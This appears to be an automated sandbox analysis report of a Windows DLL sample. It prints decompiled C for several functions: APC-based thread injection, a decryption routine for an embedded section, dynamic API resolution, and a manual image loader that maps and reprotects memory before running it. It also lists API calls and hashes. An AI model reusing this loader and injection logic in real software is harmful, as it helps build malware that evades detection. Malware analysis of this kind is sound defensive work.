Instruction ID: c2e1df4bd107af70444a416f68efa6170b0c160843a31719881fe4a8dfe92026
Opcode Fuzzy Hash: 9a56f4c1b1dcb1688552e68bd8326c29efb8aa507bf3402e5ec4f2c41fb77d0d
Instruction Fuzzy Hash: 332192B2600118BFDF20EFE8CC98E9E77B9EB59B55F218035F615D7140D730998AAB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E171F56, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e174108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e17410c;
						if( *0x6e17410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e174118;
								if( *0x6e174118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e17410c);
						}
						HeapDestroy( *0x6e174110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e174108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6e174110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e174130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E17179C(E6E17173D, E6E171C6E(_a12, 1, 0x6e174118, _t41));
							 *0x6e17410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6e171f59
0x6e171f65
0x6e171f67
0x6e171f6a
0x6e171fe0
0x6e171fe6
0x6e171fe8
0x6e171fea
0x6e171ff0
0x6e171ff2
0x6e171ff7
0x6e171ffa
0x6e172005
0x6e172007
0x00000000
0x00000000
0x6e172009
0x6e17200c
0x6e17200e
0x00000000
0x00000000
0x00000000
0x6e17200e
0x6e172016
0x6e172016
0x6e172022
0x6e172022
0x6e171f6c
0x6e171f6d
0x6e171f8d
0x6e171f93
0x6e171f98
0x6e171f9a
0x6e171fd6
0x6e171fd6
0x6e171f9c
0x6e171fa4
0x6e171fab
0x6e171fb5
0x6e171fc1
0x6e171fc6
0x6e171fcd
0x6e171fd2
0x00000000
0x6e171fd2
0x6e171fcd
0x6e171f9a
0x6e171f6d
0x6e17202f

APIs

InterlockedIncrement.KERNEL32(6E174108), ref: 6E171F78
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E171F8D

Part of subcall function 6E17179C: CreateThread.KERNELBASE ref: 6E1717B3
Part of subcall function 6E17179C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1717C8
Part of subcall function 6E17179C: GetLastError.KERNEL32(00000000), ref: 6E1717D3
Part of subcall function 6E17179C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1717DD
Part of subcall function 6E17179C: CloseHandle.KERNEL32(00000000), ref: 6E1717E4
Part of subcall function 6E17179C: SetLastError.KERNEL32(00000000), ref: 6E1717ED

InterlockedDecrement.KERNEL32(6E174108), ref: 6E171FE0
SleepEx.KERNEL32(00000064,00000001), ref: 6E171FFA
CloseHandle.KERNEL32 ref: 6E172016
HeapDestroy.KERNEL32 ref: 6E172022

Strings

Txt, xrefs: 6E171F8D

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID: Txt
API String ID: 2110400756-4033135041
Opcode ID: 7c1c3713b2cb484d4c3ce7ed2171d21a5d58c4cef65dfddb560bd7e0d4d518bd
Instruction ID: c9f667a5d7b73ec2596607fe459eb8a3367e1ab93670c7f50358fc3e1e1cc801
Opcode Fuzzy Hash: 7c1c3713b2cb484d4c3ce7ed2171d21a5d58c4cef65dfddb560bd7e0d4d518bd
Instruction Fuzzy Hash: 1121A171604A25AFCF20AFE9CC8894D3BE8E767F60B208429E515D3100D330998AFB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E17150D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E17150D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E171CC8(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e174144 + 0x6e175014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e174144 + 0x6e175151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E17133D(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e174144 + 0x6e175161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e174144 + 0x6e175174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e174144 + 0x6e175189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e174144 + 0x6e17519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E1715F1(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6e17151b
0x6e17151f
0x6e1715e0
0x6e171525
0x6e17153d
0x6e17154c
0x6e171553
0x6e171555
0x6e17155a
0x6e1715d8
0x6e1715d9
0x6e17155c
0x6e171569
0x6e17156b
0x6e171570
0x00000000
0x6e171572
0x6e17157f
0x6e171581
0x6e171586
0x00000000
0x6e171588
0x6e171595
0x6e171597
0x6e17159c
0x00000000
0x6e17159e
0x6e1715ab
0x6e1715ad
0x6e1715b2
0x00000000
0x6e1715b4
0x6e1715ba
0x6e1715c0
0x6e1715c5
0x6e1715ca
0x6e1715cf
0x00000000
0x6e1715d1
0x6e1715d4
0x6e1715d4
0x6e1715cf
0x6e1715b2
0x6e17159c
0x6e171586
0x6e171570
0x6e17155a
0x6e1715ee

APIs

Part of subcall function 6E171CC8: HeapAlloc.KERNEL32(00000000,?,6E171C03,00000208,00000000,00000000,?,?,?,6E1712A1,?), ref: 6E171CD4

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1716D5,?,?,?,?,?,00000002,?,6E1714D0), ref: 6E171531
GetProcAddress.KERNEL32(00000000,?), ref: 6E171553
GetProcAddress.KERNEL32(00000000,?), ref: 6E171569
GetProcAddress.KERNEL32(00000000,?), ref: 6E17157F
GetProcAddress.KERNEL32(00000000,?), ref: 6E171595
GetProcAddress.KERNEL32(00000000,?), ref: 6E1715AB

Part of subcall function 6E1715F1: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6E17164E
Part of subcall function 6E1715F1: memset.NTDLL ref: 6E171670

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 6951051954342f6b2ed9ed64fa43f5f3c1f04c18e18dd84cfb9c7045f95b1322
Instruction ID: ac7ed8559a51255c10f30c96404e1625c4c490581258fe36cf9c23cdb3bac979
Opcode Fuzzy Hash: 6951051954342f6b2ed9ed64fa43f5f3c1f04c18e18dd84cfb9c7045f95b1322
Instruction Fuzzy Hash: 5F2160B070061B9FDF21EFAAC990D5A77ECEF56B047514425E445EB200EB30E949AB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E17179C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E17179C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e174140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e1717b3
0x6e1717b9
0x6e1717bd
0x6e1717c8
0x6e1717d0
0x6e1717d9
0x6e1717dd
0x6e1717e4
0x6e1717eb
0x6e1717ed
0x6e1717f3
0x6e1717d0
0x6e1717f7

APIs

CreateThread.KERNELBASE ref: 6E1717B3
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1717C8
GetLastError.KERNEL32(00000000), ref: 6E1717D3
TerminateThread.KERNEL32(00000000,00000000), ref: 6E1717DD
CloseHandle.KERNEL32(00000000), ref: 6E1717E4
SetLastError.KERNEL32(00000000), ref: 6E1717ED

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 510e390906a72a6b898cbc5201a906150f92a0760b02a1ccd918d0dbb3919277
Instruction ID: 8368e46bb2624e3dad7374c90418f7f0c82faa87560c0645d4f894f7b567cba2
Opcode Fuzzy Hash: 510e390906a72a6b898cbc5201a906150f92a0760b02a1ccd918d0dbb3919277
Instruction Fuzzy Hash: CFF0F832205A31FBDF225BA19C4DF9FBB69FB0AF51F108404F65591150C7218816BBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1710E8, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E1710E8(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6e174130;
				_t50 = E6E171B4C(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6e174140;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6e1751a7; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6e174140 = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x6e1710ef
0x6e1710ff
0x6e171104
0x6e171109
0x6e17111e
0x6e171125
0x6e17112a
0x6e17113b
0x6e17113e
0x6e171144
0x6e171146
0x6e17114b
0x6e171227
0x6e171151
0x6e171151
0x6e171155
0x6e1711ed
0x6e17115b
0x6e17115c
0x6e171161
0x6e171164
0x6e171167
0x6e171167
0x6e17116e
0x6e171171
0x6e171179
0x6e17117a
0x6e17117b
0x6e171182
0x6e171186
0x6e17118c
0x6e171190
0x6e171192
0x6e171196
0x6e171199
0x6e1711a0
0x6e1711a3
0x6e1711a6
0x6e1711ab
0x6e1711c1
0x6e1711ad
0x6e1711b7
0x6e1711b9
0x6e1711bc
0x6e1711bc
0x6e1711c8
0x6e1711c8
0x6e1711c8
0x6e1711a0
0x6e1711d3
0x6e1711d6
0x6e1711d9
0x6e1711e0
0x6e1711e6
0x6e1711ea
0x6e1711f9
0x6e17120e
0x6e1711fb
0x6e171204
0x6e171209
0x6e17121f
0x6e17121f
0x6e17122e
0x6e171234

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E17113E
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E171204
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E17121F

Strings

May 5 2021, xrefs: 6E171171

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: May 5 2021
API String ID: 4010158826-1965333733
Opcode ID: a8beb2662eede0af4f5d03843f45d6e87eacfd0305d8334bbaac6b999650bf89
Instruction ID: ddff1d1e4ba43e7e68dc4dd19cff11756d2610f67a3110d25585ea4fd1641b0e
Opcode Fuzzy Hash: a8beb2662eede0af4f5d03843f45d6e87eacfd0305d8334bbaac6b999650bf89
Instruction Fuzzy Hash: E5416E71E0021ADFDF10CFD9C890ADEBBB6BF55B10F258129D900BB244C774AA49DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E17173D, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E17173D(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E171237(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e171746
0x6e17174b
0x6e171759
0x6e17175e
0x6e17175e
0x6e171764
0x6e171769
0x6e17176d
0x6e171771
0x6e171771
0x6e17177b
0x6e171784

APIs

GetCurrentThread.KERNEL32 ref: 6E171740
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E17174B
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E17175E
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E171771

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 0a766f4119be08faf35c2369503788eb06358daad73753f15491a90e13258c45
Instruction ID: fa9d1ccaf1def990f8453295185852b01486dabc564a960cbb4c8b012c70aece
Opcode Fuzzy Hash: 0a766f4119be08faf35c2369503788eb06358daad73753f15491a90e13258c45
Instruction Fuzzy Hash: D6E09B313066215BAE116A694C98E5F775CDF93B717114236F521D21D0CB508C07A5B5

Uniqueness

Uniqueness Score: -1.00%

Function 6E171E32, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E171E32(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e174140;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6e171e3c
0x6e171e49
0x6e171e4f
0x6e171e5b
0x6e171e6b
0x6e171e6d
0x6e171e75
0x6e171f0a
0x6e171f11
0x00000000
0x00000000
0x00000000
0x6e171e7b
0x6e171e7b
0x6e171e7b
0x6e171e7f
0x00000000
0x00000000
0x6e171e8b
0x6e171e8f
0x6e171eb3
0x6e171eb7
0x6e171ecb
0x6e171ecb
0x6e171ed1
0x6e171ee0
0x6e171ee4
0x6e171eec
0x6e171eec
0x6e171ef4
0x6e171ef7
0x6e171f04
0x00000000
0x00000000
0x00000000
0x00000000
0x6e171f04
0x6e171ebf
0x6e171ec3
0x6e171ec9
0x00000000
0x00000000
0x00000000
0x6e171ec9
0x6e171e97
0x6e171e9b
0x6e171ea5
0x6e171e9d
0x6e171e9d
0x6e171e9d
0x00000000
0x6e171e9b
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E171E6B
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E171EE0
GetLastError.KERNEL32 ref: 6E171EE6

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: eb3890ff1a944c1da8c2198fb8eb0f5498da711e73ece5f709cb408ab291c5bf
Instruction ID: 039c50612cf00964dacd8df85feebe62051962f91a6d4c836910cf4e3a8bc135
Opcode Fuzzy Hash: eb3890ff1a944c1da8c2198fb8eb0f5498da711e73ece5f709cb408ab291c5bf
Instruction Fuzzy Hash: F2218031A0020ADFDF24CF99C8A1AAAF7F5FF08B49F504859D10297440E7B8A6D9DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E171424, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E171424() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6e174144;
				if( *0x6e17412c > 5) {
					_t16 = _t15 + 0x6e1750f9;
				} else {
					_t16 = _t15 + 0x6e1750b1;
				}
				E6E1710BC(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6E171A26( &_v32,  &_v16,  *0x6e174140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6e174138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6E171352(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6e174138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6E172032(_t44, _t32 + 4);
						}
					}
					_t25 = E6E171699(_v28); // executed
				}
				ExitThread(_t25);
			}

0x6e17142a
0x6e17143b
0x6e171445
0x6e17143d
0x6e17143d
0x6e17143d
0x6e17144c
0x6e171455
0x6e17145a
0x6e171478
0x6e1714d4
0x6e17147a
0x6e171480
0x6e171486
0x6e171494
0x6e171498
0x6e17149f
0x6e1714a8
0x6e1714ac
0x6e1714b2
0x6e1714c3
0x6e1714b4
0x6e1714ba
0x6e1714ba
0x6e1714b2
0x6e1714cb
0x6e1714cb
0x6e1714d6

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 6E171480
ExitThread.KERNEL32 ref: 6E1714D6

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: dd20d0514bb5406c3a254d212ae22c18bb46b6118d16792c6c60aa090b941775
Instruction ID: 888d5c7f979216f970865385948a54b4eee7e9052fd1c802af9c0f74be89061f
Opcode Fuzzy Hash: dd20d0514bb5406c3a254d212ae22c18bb46b6118d16792c6c60aa090b941775
Instruction Fuzzy Hash: 3E11E2712086059FDF21DFE4C868E8B77ECAB45F04F114825F545D7190E730E5C9AB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1BA760, Relevance: 1.8, APIs: 1, Instructions: 255memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E1B6ED0: RtlEnterCriticalSection.NTDLL(?), ref: 6E1B6EDF

RtlAllocateHeap.NTDLL(6E257728,00000000,?), ref: 6E1BA8EF

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: AllocateCriticalEnterHeapSection
String ID:
API String ID: 8947104-0
Opcode ID: ff91b4454bbcd075221a7654b99581fb9cddd5cc0ce053695d3002a942470e6c
Instruction ID: f2b5579d3025ac6c6388df9d3f8602974b58e3f5ce7164b5099777eb5f8d70a0
Opcode Fuzzy Hash: ff91b4454bbcd075221a7654b99581fb9cddd5cc0ce053695d3002a942470e6c
Instruction Fuzzy Hash: 30B18DB4A00208AFDF04CF98C994BDE7BB6FB59314F208519E915AB3C0D775A981DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1710BC, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E1710BC(void* __eax, intOrPtr _a4) {

				 *0x6e174150 =  *0x6e174150 & 0x00000000;
				_push(0);
				_push(0x6e17414c);
				_push(1);
				_push(_a4);
				 *0x6e174148 = 0xc; // executed
				L6E1710E2(); // executed
				return __eax;
			}

0x6e1710bc
0x6e1710c3
0x6e1710c5
0x6e1710ca
0x6e1710cc
0x6e1710d0
0x6e1710da
0x6e1710df

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E171451,00000001,6E17414C,00000000), ref: 6E1710DA

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 10fa4205d85a2907b53a8419b6a4d2950cdd4de954425ea3794635f74f1392e6
Instruction ID: 168140fcb161a938c8ca6ff02e11634d18b2d26b44913d6c4215aeb1216ae01b
Opcode Fuzzy Hash: 10fa4205d85a2907b53a8419b6a4d2950cdd4de954425ea3794635f74f1392e6
Instruction Fuzzy Hash: DEC04C74140750A6EE30BBD48C49F467B517765F05F218508F610256C0D3B52099A515

Uniqueness

Uniqueness Score: -1.00%

Function 6E171699, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E171699(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e174140;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e174140 - 0x63698bc4 &  !( *0x6e174140 - 0x63698bc4);
				_t18 = E6E17150D( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e174140 - 0x63698bc4 &  !( *0x6e174140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e174140 - 0x63698bc4 &  !( *0x6e174140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E171000(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E1717FA(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E171E32(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E17133D(_t42);
					L8:
					return _t29;
				}
			}

0x6e1716a1
0x6e1716a3
0x6e1716bf
0x6e1716d0
0x6e1716d7
0x6e171735
0x00000000
0x6e1716d9
0x6e1716d9
0x6e1716e3
